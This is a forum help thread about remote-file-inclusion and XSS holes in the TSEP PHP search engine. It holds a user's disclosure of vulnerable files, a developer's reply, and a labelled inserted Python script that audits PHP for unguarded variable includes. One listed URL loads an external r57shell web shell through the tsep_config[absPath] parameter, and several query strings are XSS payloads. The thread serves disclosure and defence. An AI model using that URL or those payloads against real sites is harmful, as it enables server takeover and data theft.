Security Hole

Help
2006-08-02
2013-04-24
  • Nobody/Anonymous

    Here is the e-mail I got from my provider:

    We recently registered a hacking attempt on our servers that
    originated from your web presence. The attacker tried to gain access
    to the server through security holes in the scripts you use. It must
    be assumed that the attacker was able to gain access to your data.

    The script concerned is `/search/include/copyright.php', which
    allows the execution of arbitrary code via the parameter
    `tsep_config[absPath]'.

    Translation (may not be so good):

    We registered a hacking-raid on our server that came from your presence. The aggressor tried to get connected to our server by using security holes in your scripts. ...

    It's a matter of the script '/search/include/copyright.php', which allows execution of any code via the parameter 'tsep_config[absPath]'.

    How can I close that Security Hole?

     
    • Nobody/Anonymous

      PS:
      I deleted this file, and the code

      request ( ..... /copyright.php ) // Use as many ...

      (I think it was in line 741 of search.php),
      and the search-engine is still working.

      Do you have any other of these security holes in your scriptcodes?

       
    • Nobody/Anonymous

      Hello there, the following scripts are vulnerable to Remote File Include:

      ./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
      ./tsep.0942/include/printpagedetails.php ==>         require_once( $tsep_config["absPath"]."/include/convert_htmlent.php" );
      ./tsep.0942/include/ipfunctions.php ==> require_once( $tsep_config["absPath"]."/include/IPv6.php" );
      ./tsep.0942/include/contentimages.class.php ==> require_once( $tsep_config["absPath"]."/include/contentimages.class.php" );
      ./tsep.0942/include/configfunctions.php ==> require_once( $tsep_config["absPath"]."/include/mmexfunctions.php" );
      ./tsep.0942/include/log.class.php ==> require_once( $tsep_config["absPath"]."/include/tseptrace.php" );

      Those scripts are vulnerable to Remote File Include. Most likely there are more files vulnerable, but I didn't feel like searching more. Temporary fix: register_globals == off, or use .htdocs to block access to the ./tsep/include dir.

      The following scripts are vulnerable to XSS, it might not be as dangerous as RFI, but who cares, they need to be fixed.

      ./tsep.0942/include/timeneeded.php?tsep_lng[search_took]=%3Ch1%3Eelite
      ./tsep.0942/include/uploadfile.php?type=%3Ch1%3EXSS
      ./tsep.0942/include/dbconnection.php?db_server=%3Ch1%3EXSS

      - beford <xbefordx gmail com>
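
An added example, not from the thread or the TSEP project: a small Python audit for the pattern listed above, an include/require whose path starts with a variable the file never sets itself, which is what lets a directly requested include file take `tsep_config[absPath]` from the request when register_globals is on. The `APP_ENTRY` guard constant and the sample files are constructed for illustration; this is a regex heuristic and does not parse PHP.

```python
import re

# include/require whose path starts with a variable, e.g.
#   require_once( $tsep_config["absPath"]."/include/IPv6.php" );
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)', re.IGNORECASE)
# Direct-access guard: the file checks for a constant before doing anything.
GUARD_RE = re.compile(r'defined\s*\(\s*[\'"]\w+[\'"]\s*\)', re.IGNORECASE)


def assigned_before(source, var, pos):
    """True if $var (or one of its array keys) is assigned before offset pos."""
    pat = re.compile(
        r'\$' + re.escape(var) + r'\b(?:\s*\[[^\]]*\])*\s*=(?![=>])')
    return pat.search(source, 0, pos) is not None


def audit(source):
    """Return [(line_no, variable)] for includes built from a variable that
    the file never sets and that no direct-access guard protects."""
    findings = []
    for m in INCLUDE_RE.finditer(source):
        var = m.group(1)
        guarded = GUARD_RE.search(source, 0, m.start()) is not None
        if not guarded and not assigned_before(source, var, m.start()):
            findings.append((source.count("\n", 0, m.start()) + 1, var))
    return findings


# Constructed sample files; only the require_once line comes from the thread.
# APP_ENTRY is a hypothetical constant an entry script would define.
SAMPLES = {
    "include/ipfunctions.php":
        '<?php\nrequire_once( $tsep_config["absPath"]."/include/IPv6.php" );\n',
    "include/guarded.php":
        '<?php\nif (!defined("APP_ENTRY")) { exit; }\n'
        'require_once( $tsep_config["absPath"]."/include/IPv6.php" );\n',
    "include/selfset.php":
        '<?php\n$tsep_config["absPath"] = dirname(__FILE__) . "/..";\n'
        'require_once( $tsep_config["absPath"]."/include/IPv6.php" );\n',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for line, var in audit(src):
            print(f"{name}:{line}: include path built from unset ${var}")
```

Commented-out includes are also reported, so review each finding by hand.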

       
    • Nobody/Anonymous

      ... and when i say .htdocs i mean .htaccess :]

      -- beford <xbefordx gmail com>

       
    • Olaf Noehring

      Olaf Noehring - 2006-08-03

      Hi

      We advise this anyways - but of course we will take care of it in the next version.

      http://www.tsep.info/tsep-latest/docs/install.php#security

      Olaf

       
    • Nobody/Anonymous

      Do you know when the next version is planned?

       
